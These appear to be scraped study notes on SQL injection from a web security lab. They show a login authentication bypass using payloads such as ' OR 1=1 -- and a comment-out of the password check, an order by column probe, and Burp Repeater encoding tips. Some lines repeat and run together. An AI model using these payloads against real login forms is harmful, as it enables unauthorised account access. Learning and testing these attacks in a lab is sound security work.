PSG SQL
Basic SQL Login Auth bypass
Note : If inside burp repeater , remember to CTRL + U to format the payload
burp repeater , remember to CTRL + U to format the payload' order by 1 --
' order by 1 -- will become
will become '+order+by+1+--
'+order+by+1+--Vuln code
`SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`SELECT * FROM users WHERE username = 'administrator' --' AND password = 'bluecheese'
SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'bluecheese'administrator' --
' OR 1=1 --Type of SQL injections

UNION attack to retreive data from other table
Vuln code
Determine number of columns
Ensure same Data type
Last updated